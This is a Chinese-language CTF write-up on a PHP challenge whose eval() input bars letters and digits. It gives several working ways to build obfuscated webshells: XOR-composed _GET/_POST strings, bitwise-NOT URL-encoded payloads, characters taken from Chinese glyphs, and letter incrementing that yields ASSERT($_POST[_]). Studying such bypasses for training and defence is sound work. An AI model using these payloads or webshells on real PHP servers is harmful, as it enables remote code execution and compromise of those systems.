【PHP-CTF】无字母无数字webshell_

PHP无字母数字构造Webshell

题目

index.php：

<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){ //检测字符长度
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){ //限制字母和数字
        die("NO.");
    }
    @eval($code); //$code的值要为非字母和数字
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

flag.php：

<?php
	function getFlag(){
		$flag = "111111111111111111";
		echo $flag;
};
?>
1
2
3
4
5
6

解题过程

方法一

在PHP中，两个字符串执行异或操作以后，得到的还是一个字符串。所以，我们想得到a-z中某个字母，就找到某两个非字母、数字的字符，他们的异或结果是这个字母即可。

<?php
    var_dump('#'^'|'); //得到字符 _
    var_dump('.'^'~'); //得到字符 P
	var_dump('/'^'`'); //得到字符 0
	var_dump('|'^'/'); //得到字符 S
	var_dump('{'^'/'); //得到字符 T
	$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
	//变量$__值为字符串'_POST'
?>
1
2
3
4
5
6
7
8
9

websell：

<?php
@$_++; //$_=NULL=0  $_++=1
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); //_POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>
1
2
3
4
5

为了节省字符长度，这里字符可以一起异或使用

<?php
var_dump("#./|{"^"|~`//"); //_POST
var_dump("`{{{"^"?<>/"); //_GET
?>
1
2
3
4

webshell：

<?php
@$_++;
$__='#./|{'^'|~`//';
${$__}[!$_](${$__}[$_]);
?>
1
2
3
4
5

答案

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag
    
$_="`{{{"^"?<>/"; //_GET
${$_}[_](${$_}[__]); //$_GET[_]($_GET[__])
&_=getFlag //执行函数 eval("getFlag(null)")
1
2
3
4
5

webshell：
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=phpinfo()
1
2

其他类型答案

如果在加上不能有&_字符呢？

只要eval函数执行了“getFlag()”字符串即可，那么绕过正则匹配即可：

把getFlag取反然后URL编码：

?code=$_=~%98%9A%8B%B9%93%9E%98;$_();
1

这里为什么正则没有检测到，因为后端自动进行了解码，解码为非字母和数字字符，而eval执行了取反还原为getFlag字符。

既然可以利用取反~进行编码绕过正则检测，那么也可以取反编码${}_{G}ET、$_POST。

方法二

使用的是位运算里的“取反”,利用UTF-8编码的某个汉字，并将其中某个字符取出来。

<?php
$__=('>'>'<')+('>'>'<'); //True+True=2;$__=2
$_=$__/$__; //$_=2/2=1
$____='';
$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});
$_____='_';$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});
$_=$$_____;
$____($_[$__]);
?>
1
2
3
4
5
6
7
8
9

方法三

参考：

http://www.thespanner.co.uk/2012/08/21/php-nonalpha-tutorial/

原理：

利用php特性，在处理字符串变量的算术运算时，PHP沿袭了Perl的习惯，而非C的。如：$a{=}^{\prime }{Z}^{\prime };$a++;结果$a的值为’‘AA’，而在C中，变为’’{’,(‘Z’的ASCII值是90，而’{'的ASCII值为91)。注意字符变量只能递增，不能递减，并且只支持纯字母（a-z A-Z）。

那么如何拿到字符串’a’的变量呢？

数组（Array）的第一个字母就是大写A，而且第4个字母是小写a。也就是说，我们可以同时拿到小写和大写A，等于我们就可以拿到a-z和A-Z的所有字母。

在PHP中，如果强制连接数组和字符串的话，数组将被转换成字符串，其值为Array：再取这个字符串的第一个字母，就可以获得’A’了。

<?php
$_=[];
$_=@"$_"; // $_='Array';
$_=$_['!'=='@']; // $_=$_[0];
$___=$_; // A
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
$___.=$__; // S
$___.=$__; // S
$__=$_;
$__++;$__++;$__++;$__++; // E 
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // R
$___.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$___.=$__;

$____='_';
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // P
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // O
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // S
$____.=$__;
$__=$_;
$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++; // T
$____.=$__;

$_=$$____;
$___($_[_]); // ASSERT($_POST[_]);
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35